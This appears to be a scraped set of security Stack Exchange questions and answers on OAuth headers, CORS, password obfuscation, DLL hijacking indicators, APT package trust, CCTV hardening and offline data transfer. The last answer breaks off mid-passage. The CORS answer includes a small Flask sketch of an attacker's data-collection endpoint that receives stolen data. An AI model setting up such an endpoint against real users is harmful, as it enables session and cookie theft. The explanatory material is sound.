The Authorization: <type> <credentials> pattern was introduced by the W3C in HTTP 1.0, and has been reused in many places since. Many web servers support multiple methods of authorization; in those cases sending just the token isn't sufficient. Sites that use the Authorization: Bearer cn389ncoiwuencr format are most likely implementing OAuth 2.0 bearer tokens. The OAuth 2.0 Authorization Framework sets a number of other requirements to keep authorization secure, for instance requiring the use of HTTPS/TLS. If you're integrating with a service that is using OAuth 2.0, it is a good idea to get familiar with the framework so that the flow you're using is implemented correctly and unnecessary vulnerabilities are avoided. There are a number of good tutorials available online.
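To make that concrete, this is roughly what a client sending an OAuth 2.0 bearer token looks like in Python with the requests library (the endpoint URL and token below are placeholders):

    import requests

    token = "cn389ncoiwuencr"  # placeholder token from the question
    resp = requests.get(
        "https://api.example.com/resource",  # hypothetical API endpoint
        headers={"Authorization": f"Bearer {token}"},
        timeout=10,
    )
    resp.raise_for_status()
    print(resp.json())

The "Bearer" prefix is what tells the server which of its supported authorization schemes this credential belongs to.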
{ "source": [ "https://security.stackexchange.com/questions/108662", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94951/" ] }
108,676
I need to access the web interface of a router standing here in the office. The problem is that it only supports SSLv3 and I cannot find a browser that allows me to connect to it. In order to update the router, I also need to be able to log in to it. I tried to SSH into it, but it does not work; maybe it is using some non-standard port. Running a (limited?) port scan using 'fing' I see it has the following standard ports open: 515 (LPD printer) and 1723 (PPTP). What browser can I use, or what other options do I have? Unable to Connect Securely Firefox cannot guarantee the safety of your data on 192.168.1.1:10443 because it uses SSLv3, a broken security protocol. Advanced info: ssl_error_unsupported_version
Internet Explorer 11 supports it, but you have to enable SSLv3 on the Advanced tab of its Internet Options first.
{ "source": [ "https://security.stackexchange.com/questions/108676", "https://security.stackexchange.com", "https://security.stackexchange.com/users/9588/" ] }
108,746
Answers to the question " How safe are password managers like LastPass? " suggest that storing personal passwords in a physical notebook might be a reasonable option: I know someone who won't use Password Safe and instead has a physical notebook with his passwords in obfuscated form. This notebook is obviously much safer against malware... whether it's at greater risk of loss/theft is an interesting question. Obviously, a piece of paper is secure against any malware attack. The requirement is for offline access to credentials. For example, a small notebook in which you write all your security details for all banks, stores, websites, even combination locks, addresses and all other details you may wish to be able to access from any location in the world. Also, it can sometimes be easier to look up passwords in a notebook -- e.g. if you travel a lot, you could store passwords on your smartphone using a password manager app. However, this means your phone needs to be charged and operational all the time, which adds another point of failure. Now, disregarding the possibilities that a notebook might be lost, stolen completely, destroyed or otherwise physically harmed, I'd like to focus on one question: How would you obfuscate (as mentioned in the first quote) passwords so that they cannot easily be deciphered by someone who is able to throw a glance at the notebook? On the other hand, the algorithm must be simple enough so that the owner of the notebook can decode his or her own passwords in almost no time. Bonus questions: Could such an algorithm be considered more or less secure even if it's posted here on Information Security, or does obfuscation always imply security through obscurity (i.e. keeping the algorithm itself secret)? Could an obfuscation algorithm be designed in such a way that it would be impossible or unlikely to decipher the passwords, even if a hypothetical attacker had access to the notebook for at least several hours? Or would that naturally contradict the requirement that the owner can decode his/her passwords quickly?
In approximate order of increasing complexity (not security, and methods may be combined), here are some ideas that would be easy for anyone used to puzzles/writing code/maths. A more complete idea is below. NB: when I say "secret" I mean not written in the book. These are all easy, and most useful for deterring the casual thief. Have a memorised secret element, common to all passwords.* (Minor variant: a secret element easily derived from the website name/username.) Put too much information in the book, e.g. know that you actually omit the first 4 characters of each password.* Offset the account and password by some constant number of entries.* Never write the full username, just enough to be a clue to you.* (* These items have the significant vulnerability that once the obfuscation is cracked for one entry, it's automatically cracked for all entries with no further effort.) If the exact algorithm is published, clearly a notebook thief who could also script login attempts (or a team, of course) could apply the algorithm automagically -- or all published algorithms. The type of algorithm could be published, for example: from the password as written, call the first digit x and the second y. Count x characters from the first punctuation mark (or first character, or first digit), then swap the cases of the next (or preceding) y letters. For a memorised 4-digit PIN, increment the first four letters by the digits of the PIN (e.g. 1234 applied to a!bcd would give b!dfh); a sketch of this variant follows this answer. Of course you could: swap the meanings of x and y; increment/decrement x and y; count from the first vowel; swap the cases of y consonants; replace digits with their corresponding letters by alphabetic position and vice versa; swap digits for the punctuation on the same key (you either need to be confident in the keyboard layout you'll encounter or know your own keyboard very well). All these operations, by definition, can be scripted. But the notebook thief would have to get hold of (or write) a script implementing these (and it's actually quite a large variable space even without a secret element). Then they'd have to type in the passwords (an error-prone process with randomly-generated text), run the script over the list, and attempt to log in with the now potentially thousands of candidate passwords per site -- and hope that the site doesn't lock out after several failed attempts. It would be worth keeping a backup list, even if not a backup copy of the book, as a list of sites for which the passwords should be changed/accounts flagged if the book went missing. As with many security measures, the goal must be to make it too much effort to break in. By combining manual and scripted effort you're doing quite a lot towards that, and increasing your chances that they'll give up.
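As an illustration only (writing your scheme down in code obviously defeats the point of keeping it in your head), here is a minimal Python sketch of the memorised-PIN variant mentioned above, where each of the first few letters is shifted by the corresponding PIN digit:

    def pin_shift(written: str, pin: str, decode: bool = False) -> str:
        """Shift the first len(pin) letters of `written` by the PIN digits; other characters pass through."""
        digits = [int(d) for d in pin]
        out, i = [], 0
        for ch in written:
            if ch.isalpha() and i < len(digits):
                shift = -digits[i] if decode else digits[i]
                base = ord("a") if ch.islower() else ord("A")
                out.append(chr((ord(ch) - base + shift) % 26 + base))
                i += 1
            else:
                out.append(ch)
        return "".join(out)

    print(pin_shift("a!bcd", "1234"))               # gives b!dfh, as in the example above
    print(pin_shift("b!dfh", "1234", decode=True))  # recovers a!bcd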
{ "source": [ "https://security.stackexchange.com/questions/108746", "https://security.stackexchange.com", "https://security.stackexchange.com/users/95041/" ] }
108,830
I recently had to read over some malware reports and associated logs for a confirmed malware detection and subsequent infection of a Windows asset. The logs clearly show .dll files in a user's AppData folder. These .dll files are named the same as .dlls normally found in system32, e.g. cryptbase.dll. I know that in this specific instance this was definitely malware and the unpacking of the rogue .dlls was part of the malware's normal process. I asked about this in chat and was told that the only real credible explanation for this behaviour would be malware (as it was in this instance) or very bad programming practice, and even then it is a rare scenario. My question is twofold: is there a scenario where .dll files with the same name as standard system32 .dlls could be found in a user's AppData folder for any reason other than malware or poor programming? In addition, is it fair to treat .dll files that are found in AppData and appear to be copies of .dll files in system32 as an indicator of compromise?
Since Microsoft tightened the default permissions on the Program Files folder, many developers have turned to AppData as an alternative location for their code, the logic being that an application installed this way can be updated without requiring elevation or admin-level access (Google Chrome, for instance, does this). This also means that, sometimes, you will find legitimate libraries that usually live in the system32 folder somewhere under the AppData path. These are usually run-time components (like the MSVCRT, GDI+ or capicom) that are maintained and updated by the application itself (usually because it requires a specific version to work, but sometimes because they are pushed as a user component instead of a system one and need to be deployed without elevation). That does not mean that you should find libraries belonging to the operating system there: there is no legitimate reason for, say, schannel.dll to be found there, since the only application that maintains that library is the operating system. So, DLLs under AppData having the same name as a DLL in system32 are not automatically suspicious.
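If you need to triage this at scale, a cheap first pass is simply to list files under a user's AppData whose names collide with libraries present in System32; a collision is a lead to investigate (check digital signatures, versions and the owning application), not a verdict. A rough Python sketch, assuming a Windows host and the standard environment variables:

    import os

    system32 = os.path.join(os.environ.get("SystemRoot", r"C:\Windows"), "System32")
    appdata = os.path.join(os.environ["USERPROFILE"], "AppData")

    # Names of DLLs shipped in System32, lower-cased for case-insensitive comparison.
    system_dlls = {name.lower() for name in os.listdir(system32) if name.lower().endswith(".dll")}

    for root, _dirs, files in os.walk(appdata):  # os.walk skips unreadable directories by default
        for name in files:
            if name.lower().endswith(".dll") and name.lower() in system_dlls:
                print("name collision:", os.path.join(root, name))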
{ "source": [ "https://security.stackexchange.com/questions/108830", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83641/" ] }
108,835
I recently learned about CORS and got the impression that its purpose is to prevent XSS . With CORS, the browser blocks requests to different domains, unless particular headers are in place. But if a person with malicious intent injects some JavaScript into a page to steal users' cookies and send them to a URL he controls, all he has to do is add the following header on the server side to make the request work anyway: Access-Control-Allow-Origin: * So how does CORS prevent XSS? Or did I misunderstand the purpose of CORS, and it simply has nothing to do with XSS per se?
TL;DR: How does CORS prevent XSS? It does not. It is not meant to do so. CORS is intended to allow resource hosts (any service that makes its data available via HTTP) to restrict which websites may access that data. Example: You are hosting a website that shows traffic data and you are using AJAX requests on your website. If SOP and CORS were not there, any other website could show your traffic data by simply AJAXing to your endpoints; anyone could easily "steal" your data and thus your users and your money. In some cases that sharing of data ( C ross O rigin R esource S haring) is intended, e.g. when displaying likes and stuff from the Facebook API on your webpage. Simply removing SOP to accomplish that is a bad idea because of the reasons explained in the above paragraph. So CORS was introduced. CORS is unrelated to XSS because any attacker who can place an evil piece of JavaScript into a website can also set up a server that sends correct CORS headers. CORS cannot prevent malicious JavaScript from sending session ids and permlogin cookies back to the attacker.
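To see why CORS is no obstacle to an attacker exfiltrating data, remember that the attacker controls the headers on their own collection server. A minimal Flask sketch (hypothetical endpoint, shown only to illustrate that the resource host decides the policy, not the victim page):

    from flask import Flask, request

    app = Flask(__name__)

    @app.route("/collect", methods=["POST"])
    def collect():
        # The attacker simply opts in to cross-origin requests on their own server.
        print("received:", request.get_data(as_text=True))
        return "", 204, {"Access-Control-Allow-Origin": "*"}

    if __name__ == "__main__":
        app.run(port=8000)

Any script already running in the victim's page can POST stolen data to such an endpoint, and CORS will happily allow it.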
{ "source": [ "https://security.stackexchange.com/questions/108835", "https://security.stackexchange.com", "https://security.stackexchange.com/users/95186/" ] }
109,087
I recently read the canonical answer of our ursine overlord to the question How do certification authorities store their private root keys? I then just had to ask myself: how do large companies (e.g. Microsoft, Apple, ...) protect their valuable source code? In particular I was asking myself how they protect their source code against theft, against malicious external modification and against malicious insider modification. The first sub-question was already (somewhat) answered in CodeExpress' answer on How to prevent private data being disclosed outside of Organization. The reasoning for the questions is simple: if the source code were stolen, a) the company would be (at least partially) hindered from selling it and b) the product would be at risk from attacks found by searching the source code. Just imagine what would happen if the Windows or iOS source code was stolen. If the code were modified by malicious external attackers, secret backdoors could be added, which can be catastrophic. This is what happened with Juniper lately, where the coordinates of the second DUAL_EC_DRBG point were replaced in their source. If the code were modified by an internal attacker (e.g. an Apple iOS engineer?), that person could make a lot of money by selling said backdoors and could put the product at severe risk if the modified version ships. Please don't come up with "law" and "contracts". While these are effective measures against theft and modification, they certainly don't work as well as technical defenses and won't stop aggressive attackers (i.e. other governments' agencies).
First off, I want to say that just because a company is big doesn't mean its security will be any better. That said, having done security work in a large number of Fortune 500 companies, including lots of name brands most people are familiar with, I'll say that currently 60-70% of them don't do as much as you'd think they should. Some even give hundreds of third-party companies around the world full access to pull from their codebase, but not necessarily write to it. A few use multiple private Github repositories for separate projects with two-factor authentication enabled and tight control over to whom they grant access, and have a process to quickly revoke access when anyone leaves. A few others are very serious about protecting things, so they do everything in house and use what to many other companies would look like excessive levels of security control and employee monitoring. These companies use solutions like Data Loss Prevention (DLP) tools to watch for code exfiltration, internal VPN access to heavily hardened environments just for development with a ton of traditional security controls and monitoring, and, in some cases, full-packet capture of all traffic in the environment where the code is stored. But as of 2015 this situation is still very rare. Something that may be of interest, and which has always seemed unusual to me, is that the financial industry, especially banks, has far worse security than one would think, and that the pharmaceutical industry is much better than other industries, including many defense contractors. There are some industries that are absolutely horrible about security. I mention this because there are other dynamics at play: it's not just big companies versus small ones, a large part of it has to do with organizational culture. To answer your question, I'm going to point out that it's the business as a whole making these decisions and not the security teams. If the security teams were in charge of everything, or even knew about all the projects going on, things probably wouldn't look anything like they do today. That said, you should keep in mind that most large businesses are publicly traded and for a number of reasons tend to be much more concerned with short-term profits, meeting quarterly numbers, and competing for market share against their other large competitors than about security risks, even if the risks could effectively destroy their business. So keep that in mind when reading the following answers. If source code were stolen: most wouldn't care and it would have almost no impact on their brand or sales. Keep in mind that the code itself is in many cases not what stores the value of a company's offering. If someone else got a copy of the Windows 10 source, they couldn't suddenly create a company selling a Windows 10 clone OS and be able to support it. The code itself is only part of the solution sold. Would the product be at greater risk because of this? Yes, absolutely. External modification: yes, but this is harder to do, and easier to catch. That said, since most companies are not seriously monitoring this, it's a very real possibility that this has happened to many large companies, especially if back-door access to their software is of significant value to other nation-states. This probably happens a lot more often than people realize. Internal attacker: depending on how smart the attacker was, this may never even be noticed or could be made to look like an inconspicuous programming mistake.
Outside of background checks and behavior monitoring, there is not much that can prevent this, but hopefully some source-code analysis tools would catch it and force the team to correct it. This is a particularly tough attack to defend against and is the reason a few companies don't outsource work to other countries and do comprehensive background checks on their developers. Static source code analysis tools are getting better, but there will always be a gap between what they can detect and what can be done. In a nutshell, the holes will always come out before the fixes, so dealing with most security issues becomes something of a race against time. Security tools help give you time trade-offs, but you'll never have "perfect" security, and getting close to that can get very expensive in terms of time (slowing developers down or requiring a lot more man-hours somewhere else). Again, just because a company is big doesn't mean it has good security. I've seen some small companies with much better security than their larger competitors, and I think this will increasingly be the case, since smaller companies that want to take their security more seriously don't have to make massive organizational changes, whereas larger companies will be forced to stick with the way they've been doing things in the past due to the transition cost. More importantly, I think it's easier for a new company (of any size, but especially smaller ones) to have security heavily integrated into its core culture rather than having to change its current/legacy culture like older companies have to. There may even be opportunities now to take market share away from a less secure product by creating a very secure version of it. Likewise, I think your question is important for a totally different reason: security is still in its infancy, so we need better solutions in areas like code management where there is a lot of room for improvement.
{ "source": [ "https://security.stackexchange.com/questions/109087", "https://security.stackexchange.com", "https://security.stackexchange.com/users/71460/" ] }
109,113
Here is a link given on curl's official website: (prefix omitted) bintray.com/artifact/download/vszakats/generic/curl-7.46.0-win64-mingw.7z When I downloaded it with prefixes http:// and https:// I got two different files. My question is why is this site serving two different files -- one over HTTP and one over HTTPS? The SHA256 hashes do not match. Here is a diff of the final URLs after redirect. The URL on the left is the one that HTTP redirects to and the URL on the right is the one HTTPS redirects to: Update: The two files were not downloaded concurrently, but they had the same version number, so I assumed they should be the same. This is not the case. The author told me some revisions do not get a new version number. The scan results for the files served from the site on different dates ( 12/05/15 was the scan date for the download over HTTP and 12/28/15 was the scan date for the download over HTTPS) led to confusion because the version number did not change but the SHA256 hash did.
The simple answer is: because it wants to! The web server can serve whatever it likes, either by configuration or coincidence. Right now, I get the same 75916c7b file over both HTTP and HTTPS and cannot confirm your theory that the web server is serving different content for HTTPS versus HTTP. However, if you managed to access the site near the time the file was updated, it could very well be that different servers were serving the different protocols and the file update had not yet propagated to the server that served you the old file. Remember that one URL can be served by any number of servers - the fact that you get one file from a URL does not exclude there being 20 copies of this file on 20 servers/caches, some of which may be out of date. This a certainty in this case, as the website appears to be using Cloudfront which is a Content Delivery Network - a piece of infrastructure explicitly designed for caching files on many distributed servers for delivery at global scale.
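If you want to check this kind of discrepancy yourself, fetch the resource over both schemes close together in time and compare digests; differing hashes plus differing final URLs (as in the diff above) point at caches or CDN nodes rather than tampering, and the real test is comparing against hashes published and signed by the author. A quick Python sketch (the URL is the one from the question and may no longer resolve):

    import hashlib
    import requests

    PATH = "bintray.com/artifact/download/vszakats/generic/curl-7.46.0-win64-mingw.7z"

    for scheme in ("http", "https"):
        r = requests.get(f"{scheme}://{PATH}", allow_redirects=True, timeout=30)
        digest = hashlib.sha256(r.content).hexdigest()
        print(scheme, r.url, digest)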
{ "source": [ "https://security.stackexchange.com/questions/109113", "https://security.stackexchange.com", "https://security.stackexchange.com/users/95441/" ] }
109,142
I just found that the website of one Polish bank forces users to open it in one browser tab only. You cannot, for example, check your transfer history while looking for an account number that you want to send money to. I cannot think of any good reasons for doing this except possible security reasons. Are there security advantages to limiting a site to only one tab? If so, what are they?
Generally, no, it's not reasonable to force users into a single tab. There are no technical security reasons for making a website available in a single tab only; this is usually just the result of poor system design. Forcing a single tab also means that when you log out, you won't leave your sensitive information plastered across twenty other tabs. This is a poor reason though, as a site that is bothered about this can use localStorage or a websocket to simultaneously clear all tabs when logging out from one tab. The human factor of security is a marginal reason why some sites might deliberately restrict themselves to a single tab: by forcing a single tab, you force people to focus on one thing at a time, and this makes them less likely to forget something. IMO, this is a poor reason as well, as the drawbacks outweigh the advantages.
{ "source": [ "https://security.stackexchange.com/questions/109142", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15648/" ] }
109,171
My parents have a vacation home out in the country and are looking to setup a home surveillance system for remote viewing. I've heard that there can be serious vulnerabilities in these products. What are some guidelines I could use to help evaluate these products? I have a software development background, so I'm comfortable with technical answers, but I'm certainly not a professional as far as system administration or network configuration. My parents are looking to spend under $300, though they can spend more if that's unrealistically low for a well protected system, so my financial resources to perform a security evaluation myself are limited.
Like most embedded hardware (routers, etc), their firmware often sucks, and unless you have unlimited time I'm afraid there is no way to thoroughly check every single camera out there. And even if you do find one that's currently secure, what guarantees that you'll get updates for vulnerabilities that will be discovered in the future ? Instead, I suggest just creating your own IP cameras by using USB webcams (or cheap/insecure IP cameras) and connecting them to a Linux/BSD computer that will actually handle all the authentication/security and then rebroadcast the camera's video feed (preferably over something secure like HTTPS). That way the internet-facing part of your home-made "camera" can be updated and hardened just like any computer, and behind it you are free to put any camera you want, including the cheapest garbage since it won't be exposed to the Internet anyway. Finally consider putting the camera system on a separate network air-gapped from the Internet - I know it doesn't apply in your case but I'd still like to mention it - the requirement for physical access is a pretty good security measure, as someone who wants to spy on you now has to physically break into your home rather than being thousands of miles away. If off-site recording is required, video could be encrypted and then streamed outside of the air-gap via a one-way Ethernet cable with the key kept securely, so that the data leaving the air-gap is meaningless unless the correct key is provided.
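For what it's worth, the "cheap camera behind a hardened Linux box" idea can be prototyped in a few lines: grab frames from a local USB webcam with OpenCV and re-serve them as an MJPEG stream with Flask. This is only a sketch; in practice you would bind it to localhost and put a reverse proxy in front of it that terminates HTTPS and enforces authentication, both of which are deliberately left out here:

    import cv2
    from flask import Flask, Response

    app = Flask(__name__)
    camera = cv2.VideoCapture(0)  # first local USB webcam

    def frames():
        while True:
            ok, frame = camera.read()
            if not ok:
                break
            ok, jpeg = cv2.imencode(".jpg", frame)
            if not ok:
                continue
            yield b"--frame\r\nContent-Type: image/jpeg\r\n\r\n" + jpeg.tobytes() + b"\r\n"

    @app.route("/stream")
    def stream():
        return Response(frames(), mimetype="multipart/x-mixed-replace; boundary=frame")

    if __name__ == "__main__":
        app.run(host="127.0.0.1", port=8080)  # expose only through an authenticated HTTPS proxy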
{ "source": [ "https://security.stackexchange.com/questions/109171", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92643/" ] }
109,184
One of the easy ways to install a program in Ubuntu Linux is to type a command in the terminal, but how do I know that the program is coming from a trusted source and not from somewhere dangerous? For example, if I was installing ClamAV, how do I know ClamAV came from www.clamav.net or somewhere safe and not from a malicious source? I mean, a hacker can do something to redirect the command to make it get the software from a fake site, correct?
As with many well-designed systems, the package system of Debian has defense in depth : multiple layers, each of which can be verified. How do we trust the package file is what the system promises? The hash value is computed and compared against the stored value. How do we trust the hash value isn't accidentally matching some other file? Multiple hash algorithms are used, and only if all those match the stored values do we trust the content actually matches. How do we trust the stored values are meant for the package file we downloaded? The hash values are downloaded in a separate file (the various Packages.* files) pre-computed automatically by the archive system. How do we trust the downloaded Packages.* files are what is promised by the system? The hash value for each file is stored in a single Release file for the whole archive. How do we trust that the Release file is what is promised by the system? The cryptographic signature is computed, and compared against the separately-downloaded pre-computed signature from the archive. How do we trust the signatures stored in the archive are actually from the archive we expected? It is certified by an archive key which we can fetch independently from a separate URL, and is installed in the initial set-up of the operating system. And so on. At some point in the chain you have to trust some part of (and party in) the system, on less-than-ideal evidence. With the above layers, the low-evidence trust window can be kept small and easily-scrutinised. The one-way hashes, and cryptographic signatures, allow us to trust the mathematics to certify what follows in sequence. The Debian wiki has a good, comprehensive description of how the APT system is secured . Of course, many other things can go wrong by mistake or malice, and violate our assumptions about what is actually happening. As usual, the only persistent defense against possible attacks is: eternal vigilance.
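You can spot-check one link of that chain yourself by comparing the SHA256 that APT's metadata records for a package against the hash of the .deb actually sitting in the local cache. A sketch (it assumes a Debian/Ubuntu system where the package has already been downloaded to /var/cache/apt/archives, and the parsing of apt-cache output is deliberately simplistic):

    import hashlib
    import subprocess
    from pathlib import Path

    pkg = "clamav"  # example package from the question
    info = subprocess.run(["apt-cache", "show", pkg],
                          capture_output=True, text=True, check=True).stdout
    recorded = next(line.split()[1] for line in info.splitlines() if line.startswith("SHA256:"))

    deb = next(Path("/var/cache/apt/archives").glob(f"{pkg}_*.deb"))
    actual = hashlib.sha256(deb.read_bytes()).hexdigest()

    print("metadata :", recorded)
    print("local deb:", actual)
    print("match" if recorded == actual else "MISMATCH")

Of course this only checks one layer; the point of the chain described above is that the metadata itself is in turn covered by the signed Release file.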
{ "source": [ "https://security.stackexchange.com/questions/109184", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94833/" ] }
109,199
If you could get physical access to a server, you could change the root/admin password even if you did not know the current password. However with encrypted disks, I don't think this is possible (or is it?). So, does this mean physically securing your server has become less important - it's still needed for other reasons - but is this reason no longer there?
Physical access, in many, likely most, situations means a total loss of security - for a variety of reasons (this all assumes encrypted disks): Theft - an attacker could steal the server or disks to attack at their own pace. This allows an attacker to take their time, and you have no idea if they've actually gained access to data. Physical modification - if I can access a server, I could add hardware; this could be anything from USB or keyboard logging to adding a wireless interface to allow remote access. Cold boot attack - there are attacks that can be used to extract encryption keys, allowing decryption of the disks. Etc. There are others of course, but this is just a sample of what can happen if an attacker has physical access. There are possible attacks that are still somewhat theoretical, such as applying backdoored UEFI images and the like. Possibly the worst part of a physical attack is that you may not even know exactly what was done, so there's a real problem with being able to trust the hardware afterwards.
{ "source": [ "https://security.stackexchange.com/questions/109199", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20195/" ] }
109,273
The Wikipedia article about Faraday cages has this anecdote: A Faraday cage was used in 2013 by the Vatican to shield the Sistine Chapel from electronic eavesdropping during the secret papal conclave to elect the next pope. Source: "Papal Election: Vatican Installs Anti-leak Security Devices at the Sistine Chapel" . International Business Times. 2013-03-10. My question is, what would this accomplish? I can see two motivators: they either don't want what they discuss to become public, or they don't want people to have any inclination as to what the decision is leaning towards before it is made. If it's the first motivator, a Faraday cage won't help. Hardware could be recording and transmit when the cage is removed or be retrieved at a later date. If it's the second motivator, it's probably a better question for the Catholic stackexchange, but I do not know of any reason why this would really matter (are people making huge bets on the outcome? If so, why does the church care?). Is there some other reason for the use of a Faraday cage I haven't thought of?
When you read up on the source quoted in the article, you will notice that it apparently isn't talking about a "real" Faraday cage around the Sistine Chapel (putting a whole building under a wire-mesh dome would be ridiculous even for the Catholic church) but rather about a figurative one in the form of the installation of equipment which blocks any electronic signals from getting out of the Sistine Chapel. The author doesn't seem to be very tech-literate (see the second-to-last paragraph), but it appears he is talking about GSM jammers or similar devices which make cellphone communication impossible through active interference, not passive blocking. Such devices are available commercially off the shelf for affordable prices. By the way: such devices violate broadcasting regulations in many countries, making them illegal. But the Vatican is a sovereign state, so they don't have that problem. The main motivation for this measure was that during the last conclave in 2005, the election of Pope Benedict XVI was leaked to the media before the official announcement. This is what the Catholic church wanted to prevent from happening again in 2013, and this is why they took technological measures to prevent anyone inside the conclave from communicating with the outside world until the official announcement. Leaking information later was a secondary concern.
{ "source": [ "https://security.stackexchange.com/questions/109273", "https://security.stackexchange.com", "https://security.stackexchange.com/users/95435/" ] }
109,293
On a POSIX system, is there a possibility for a file which is non-executable and read-only (aka with a mode 444) to run malicious code on a machine? If so, can you explain how it would do so?
Yes, something just has to execute it. The X flag hints to the shell that it can be directly executed, but that doesn't stop other programs from executing it if they know how. For example, if you have a file a.sh which is not executable to the shell, you can execute it by calling bash a.sh (which tells bash explicitly to execute it). If you have a non-executable file a.py, you can execute it by calling python a.py. I'd imagine there's also a way to tell the OS to execute a binary ELF file, but I don't know the command off hand. There is also a whole class of things which don't require you to do anything in particular to make them execute malicious code. PDFs and Adobe Flash files in particular have had some well-known holes which allowed the simple act of reading a file to execute malicious code. There are also some files which, in specific places, can be auto-executed (especially on Windows). Also, if the file is compressed, it may contain a buffer-overflow exploit for the decompressor. The file may also be even more malicious, taking advantage of a yet-unknown bug in the file system or something else really low-level. Bottom line: the only way to guarantee something won't infect your computer is to never do anything with anything.
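A small demonstration of the first point in Python: a file with mode 444 (readable by everyone, executable by no one) still runs the moment an interpreter is explicitly asked to read and execute it:

    import os
    import subprocess

    with open("payload.py", "w") as f:
        f.write("print('executed without the x bit set')\n")
    os.chmod("payload.py", 0o444)  # r--r--r--

    # ./payload.py would be refused by the shell, but the interpreter only needs read access.
    subprocess.run(["python3", "payload.py"], check=True)

    os.chmod("payload.py", 0o644)  # clean up so the demo can be re-run
    os.remove("payload.py")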
{ "source": [ "https://security.stackexchange.com/questions/109293", "https://security.stackexchange.com", "https://security.stackexchange.com/users/95628/" ] }
109,398
A public website of a financial firm (falls under SEC) has a HTML 5 map of the US where each point on the map is the 5 digit zip code of their clients. These points are generated from a CSV file that is pulled from the server into the browser so you can actually download the CSV file yourself. The CSV file contains the City, Zip, and Latitude/Longitude of the zip code itself, not the client's street address. I was wondering, are zip codes alone considered personal identifying information?
Netflix once planned to have a contest (to improve movie recommendations) where they would release movie rental history and movie reviews along with users' birth dates, gender, and five-digit zip code. That combination is personally identifying information and could do things like out someone's private sexual identity if that could be inferred from their rental history. A famous study found that with the date of birth, gender, and five-digit zip code you can uniquely identify about 87% of Americans. It also found that you could uniquely identify about 100,000 Americans (0.04%) by the combination of year of birth, gender, and zip code. For medical de-identification of protected health information (PHI), the US Dept of Health and Human Services suggests truncating the last two digits of the five-digit zip code, except for 17 rare three-digit zip code prefixes (where fewer than 20,000 people share these three initial digits according to the US Census; specifically 036, 059, 063, 102, 203, 556, 692, 790, 821, 823, 830, 831, 878, 879, 884, 890, 893), in which case you should replace the zip code with all zeros. Similarly, you should be mindful of fields like age where exceptional values are rare (e.g., there's only one American with an age of 116), so HHS recommends grouping these exceptional ages into one category (e.g., 90+). It's also probably better to group other users into age categories (like 50-55) to help anonymize them further.
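The HHS Safe Harbor rule mentioned above is mechanical enough to express in a few lines. A sketch (the restricted three-digit prefixes are the ones quoted in this answer; "prefix + 00" is just one way of representing a truncated ZIP):

    RESTRICTED_PREFIXES = {
        "036", "059", "063", "102", "203", "556", "692", "790", "821",
        "823", "830", "831", "878", "879", "884", "890", "893",
    }

    def safe_harbor_zip(zip5: str) -> str:
        """Truncate a 5-digit ZIP to its 3-digit prefix; zero it out entirely for sparse prefixes."""
        prefix = zip5[:3]
        return "00000" if prefix in RESTRICTED_PREFIXES else prefix + "00"

    print(safe_harbor_zip("90210"))  # -> 90200
    print(safe_harbor_zip("03683"))  # -> 00000 (sparse prefix)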
{ "source": [ "https://security.stackexchange.com/questions/109398", "https://security.stackexchange.com", "https://security.stackexchange.com/users/86493/" ] }
109,477
Since, recently, it has been shown that transferring data through the USB port is fundamentally flawed, I'm wondering if there are 100% secure ways to transfer data without using the Internet. Suppose Alan has a computer system that has been offline for all of its life. Alan wants to import some data from Bob. Can Alan do this and remain disconnected from the outside world? My thoughts were that either Alan has to have complete control over the data being transferred (i.e. Alan knows 100% what he is importing), or Alan must know exactly (and I mean it) how data is being handled by his computer system. That is because Alan might already have malware installed on his computer system, and this malware might use pieces of the transferred data to communicate between Alan's computer system and the outside world, without any malware actually being installed during the transfer. Edit: Instead of "Alan wants to import some data from Bob", I should have written that Alan and Bob want to communicate bidirectionally while neither of them is connected to the Internet during their communication. When I wrote "security", I meant ensuring that Alan does not leak any data other than the data he intends to send. So, even if the data gets modified when it gets to Bob, as long as the bits of data that were modified are not copied from Alan's system, it would qualify as 100% secure, for this type of security. Also, Bob is a regular Internet user, with the possibility of going offline for some period of time (i.e. during the data transfer between the two). When I wrote "Alan has to have complete control over the data being transferred", I meant that Alan has to have a way of checking, bit by bit, the information that is in transit, and in some way understand it precisely. Just to be more explicit, Bob can have malware on his computer as well.
It really depends upon the specific threats you may be facing, the direction of your data transfers, etc. USB-specific dangers: you mention the dangers of USB. The main one is indeed related to its firmware, which opens the possibility of a BadUSB-type attack. When you need to transfer data in both directions, you may therefore prefer to use SD-Cards, which are not sensitive to such threats (if you use an external USB SD-Card reader, it should be safe, but dedicate it to a single computer, don't share it!). I insist here that I'm mentioning SD-Cards as a viable solution against USB firmware attacks only. In such attacks, a USB flash drive's firmware may be corrupted in order to simulate rogue devices (fake keyboard, network card, etc.); such attacks are not possible with SD-Cards. I think this is the reason why we see Edward Snowden relying on SD-Cards in Laura Poitras' Citizenfour film when exchanging files between his own computer and the reporters' ones. SD-Cards are also equipped with a read-only switch. While such switches are very convenient for preventing accidental modification of the card's content, they cannot be relied upon to prevent malicious modifications, since read-only access is not enforced by the card itself but delegated to the computer's operating system. Enforce one-way communication: you talk about a possible leak of information by some malware on Alan's computer storing data in some hidden channel. If your transfers are mostly in one direction only and this is your main threat, then I suggest you use read-only media like CDs or DVDs. I don't know if read-only CD/DVD drives are still on the market; that would be best, since it would physically remove any possibility for Alan's PC to store data on them, but even without that it would be far harder to store any data discreetly on such a disk. With some digging, you may also find some other alternatives; for instance, in the thread how to protect my USB stick from Viruses you will see a discussion pertaining to USB sticks containing a write-blocking switch (which works in a more secure way than the SD-Card's equivalent), the use of write blockers, which are equipment normally designed for forensic purposes, etc. Long-distance communication: implemented as-is, the solutions provided above suppose that Alan and Bob are in direct contact, which may not always be true. However, data transfer outside of any computer network remains possible even over long distances, mostly by using ordinary postal mail, aka snail mail. This method may be wrongly perceived as insecure by some people, while when used correctly it can actually offer a very high security level. Such methods are used by industry when a very large amount of data must be moved securely. Amazon provides its Snowball service for such operations, and Wikipedia's page about sneakernet also lists some other real-life usage examples, including funny experiments inspired by an April Fools' Day RFC using carrier pigeons to carry the storage medium. In our current scenario, Alan and Bob will need to take a few precautions to ensure everything goes smoothly: Alan and Bob will need to exchange their public keys. This may sound simple, but in the concrete world Alan and Bob may have no possibility to meet even once, may not know each other and may have no common trusted third party to vouch for each other's identity or provide an escrow service. However, the whole security of this system relies on this operation being done successfully.
